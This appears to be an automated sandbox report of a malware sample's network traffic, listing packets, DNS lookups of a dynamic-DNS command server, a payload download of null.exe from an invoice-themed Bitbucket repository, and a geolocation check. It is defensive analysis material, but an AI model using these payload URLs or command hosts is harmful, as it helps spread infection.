                                                                                                                                                    Dec 12, 2024 18:02:08.545650959 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.545660973 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.545746088 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.553541899 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.553561926 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.553647995 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.553663015 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.553708076 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.560720921 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.560738087 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.560812950 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.560823917 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.560862064 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.569124937 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.569140911 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.569205999 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.569216013 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.569246054 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.569266081 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.576519012 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.576546907 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.576616049 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.576622963 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.576664925 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.714457989 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.714488029 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.714559078 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.714570045 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.714595079 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.714607954 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.723758936 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.723776102 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.723834038 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.723841906 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.723886013 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.729752064 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.729768038 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.729814053 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.729820967 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.729873896 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.729873896 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.737828970 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.737848043 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.737901926 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.737915039 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.737941027 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.737953901 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.746987104 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.747005939 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.747103930 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.747113943 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.747215986 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.752882957 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.752902031 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.752966881 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.752978086 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.753031015 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.761293888 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.761312008 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.761372089 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.761382103 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.761425972 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.768412113 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.768429041 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.768481970 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.768488884 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.768526077 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.908587933 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.908621073 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.908660889 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.908687115 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.908720970 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.908767939 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.915601969 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.915621042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.915692091 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.915704012 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.915747881 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.923732996 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.923755884 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.923820972 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.923834085 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.923887968 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.931143045 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.931200981 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.931230068 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.931240082 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.931272030 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.931288958 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.938853025 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.938901901 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.938935995 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.938944101 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.938977003 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.938993931 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.946924925 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.947030067 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.947216988 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.947216988 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.947299004 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.947362900 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.949764967 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.949846029 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.949851990 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.949942112 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.949997902 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.950323105 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:11.674134970 CET4978630203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:11.794011116 CET3020349786181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:11.794166088 CET4978630203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:11.804049015 CET4978630203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:11.924319983 CET3020349786181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:11.924396038 CET4978630203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:12.044302940 CET3020349786181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:13.253186941 CET3020349786181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:13.253259897 CET4978630203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:13.259387016 CET4978630203192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:13.379097939 CET3020349786181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:36.775799990 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:36.895590067 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:36.895734072 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:36.897207022 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:37.017354012 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:38.178693056 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:38.181329012 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:38.304480076 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:38.413319111 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:38.463900089 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:39.411144972 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:02:39.530973911 CET8049850178.237.33.50192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:39.531105995 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:02:39.531410933 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:02:39.652278900 CET8049850178.237.33.50192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:40.787400007 CET8049850178.237.33.50192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:40.788175106 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:02:41.027606010 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:41.152168036 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:41.804702044 CET8049850178.237.33.50192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:41.804800987 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:02:56.081588984 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:56.085957050 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:02:56.205842972 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:03:26.355169058 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:03:26.356586933 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:03:26.482192993 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:03:56.757786036 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:03:56.759754896 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:03:56.879658937 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:04:27.163722992 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:04:27.165647984 CET498431842192.168.2.5181.131.217.244
                                                                                                                                                    Dec 12, 2024 18:04:27.285754919 CET184249843181.131.217.244192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:04:29.246095896 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:04:29.573740959 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:04:30.230011940 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:04:31.526828051 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:04:34.120647907 CET4985080192.168.2.5178.237.33.50
                                                                                                                                                    Dec 12, 2024 18:04:39.292515993 CET4985080192.168.2.5178.237.33.50

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Dec 12, 2024 18:01:54.178286076 CET6356353192.168.2.51.1.1.1
                                                                                                                                                    Dec 12, 2024 18:01:54.318901062 CET53635631.1.1.1192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:01:57.399106026 CET6031153192.168.2.51.1.1.1
                                                                                                                                                    Dec 12, 2024 18:01:57.537111998 CET53603111.1.1.1192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:00.003859997 CET5548253192.168.2.51.1.1.1
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET53554821.1.1.1192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:36.632292986 CET5419553192.168.2.51.1.1.1
                                                                                                                                                    Dec 12, 2024 18:02:36.771083117 CET53541951.1.1.1192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:39.267191887 CET6237153192.168.2.51.1.1.1
                                                                                                                                                    Dec 12, 2024 18:02:39.406378031 CET53623711.1.1.1192.168.2.5

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Dec 12, 2024 18:01:54.178286076 CET192.168.2.51.1.1.10xbed3Standard query (0)navegacionseguracol24vip.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:01:57.399106026 CET192.168.2.51.1.1.10x552Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.003859997 CET192.168.2.51.1.1.10x213bStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:36.632292986 CET192.168.2.51.1.1.10x926Standard query (0)newstaticfreepoint24.ddns-ip.netA (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:39.267191887 CET192.168.2.51.1.1.10x1a43Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Dec 12, 2024 18:01:54.318901062 CET1.1.1.1192.168.2.50xbed3No error (0)navegacionseguracol24vip.org181.131.217.244A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:01:57.537111998 CET1.1.1.1192.168.2.50x552No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:01:57.537111998 CET1.1.1.1192.168.2.50x552No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:01:57.537111998 CET1.1.1.1192.168.2.50x552No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-w.us-east-1.amazonaws.com3.5.24.44A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-w.us-east-1.amazonaws.com3.5.28.21A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-w.us-east-1.amazonaws.com52.216.42.153A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-w.us-east-1.amazonaws.com52.217.230.1A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-w.us-east-1.amazonaws.com52.217.133.241A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.161A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-w.us-east-1.amazonaws.com52.217.192.137A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:00.343940973 CET1.1.1.1192.168.2.50x213bNo error (0)s3-w.us-east-1.amazonaws.com16.182.38.225A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:36.771083117 CET1.1.1.1192.168.2.50x926No error (0)newstaticfreepoint24.ddns-ip.net181.131.217.244A (IP address)IN (0x0001)false
                                                                                                                                                    Dec 12, 2024 18:02:39.406378031 CET1.1.1.1192.168.2.50x1a43No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • bitbucket.org
                                                                                                                                                    • bbuseruploads.s3.amazonaws.com
                                                                                                                                                    • geoplugin.net

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.549850178.237.33.50807120C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Dec 12, 2024 18:02:39.531410933 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Dec 12, 2024 18:02:40.787400007 CET1171INHTTP/1.1 200 OK
                                                                                                                                                    date: Thu, 12 Dec 2024 17:02:40 GMT
                                                                                                                                                    server: Apache
                                                                                                                                                    content-length: 963
                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                                    Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.549750185.166.143.494431372C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-12-12 17:01:59 UTC101OUTGET /facturacioncol/fact/downloads/null.exe HTTP/1.1
                                                                                                                                                    Host: bitbucket.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2024-12-12 17:01:59 UTC5960INHTTP/1.1 302 Found
                                                                                                                                                    Date: Thu, 12 Dec 2024 17:01:59 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Server: AtlassianEdge
                                                                                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGB46CDIP&Signature=OsUnoSTQrRgZD6FYZJqgppUhBLs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIQC1qssmaZMu0Kq%2F5UE7VMx074oM1d%2BXj1uJ%2B9uNqpoePQIgFeE4zY04aoLCi5xHmh1Tg9HBeMUGDXUCT9cKr%2FT49vsqsAIIwv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDL4p3i3uRNNKPKBtsiqEAmWSN4qXnlEPekaIRewDbxqmzd738FbMSYF6yOejRX7UjKy58YjDJFsXH4LoiMqySTikefatHXwx8UawuXSw40xhPCSf6ZNVVhxIs6%2B98cEmwIvmpRC%2FOdW4sDY4BxSBIF%2F2NDDOh7bpfb7NAWS%2B9VcOTbH6Q5Odca1yZcK4sIsx90QntabTAavZ5qDYhdxdDEHOXtZ1I67Kh3cnKHUnUsfzGqjAWfoXFAT%2B6VxUzAueumFQfzwfbjwOus4ML23IBZ%2F8pc8JVhhIpJZjV04Xv2X%2BZ%2BDSSf4IIoyBBrjX%2Fp23vP%2B%2FAEHvBknm1v51J7irQC8H%2FqOcUfKjIseMSrem7rdR3R7tML2q7LoGOp0Be%2BbdUZ1VS1k%2BpYMTJXZ%2F0oOTjr23Th9wKEZGAxpdrR2zB1mn2dI1EsUc4DFBYgtG7bhYUMbmqOm68u4XRTBt5CkqTMOhF2vlWfjFIst [TRUNCATED]
                                                                                                                                                    Expires: Thu, 12 Dec 2024 17:01:59 GMT
                                                                                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                    X-Used-Mesh: False
                                                                                                                                                    Vary: Accept-Language, Origin
                                                                                                                                                    Content-Language: en
                                                                                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                    X-Dc-Location: Micros-3
                                                                                                                                                    X-Served-By: 6a30398dd4d5
                                                                                                                                                    X-Version: b7875da02c7c
                                                                                                                                                    X-Static-Version: b7875da02c7c
                                                                                                                                                    X-Request-Count: 1320
                                                                                                                                                    X-Render-Time: 0.0440976619720459
                                                                                                                                                    X-B3-Traceid: 5645ff12a3f84613938a48c5e72bca00
                                                                                                                                                    X-B3-Spanid: 2f952d108af986c0
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--cate [TRUNCATED]
                                                                                                                                                    X-Usage-Quota-Remaining: 999133.595
                                                                                                                                                    X-Usage-Request-Cost: 879.33
                                                                                                                                                    X-Usage-User-Time: 0.016840
                                                                                                                                                    X-Usage-System-Time: 0.009540
                                                                                                                                                    X-Usage-Input-Ops: 0
                                                                                                                                                    X-Usage-Output-Ops: 0
                                                                                                                                                    Age: 0
                                                                                                                                                    X-Cache: MISS
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Xss-Protection: 1; mode=block
                                                                                                                                                    Atl-Traceid: 5645ff12a3f84613938a48c5e72bca00
                                                                                                                                                    Atl-Request-Id: 5645ff12-a3f8-4613-938a-48c5e72bca00
                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                    Server-Timing: atl-edge;dur=154,atl-edge-internal;dur=3,atl-edge-upstream;dur=152,atl-edge-pop;desc="aws-eu-central-1"
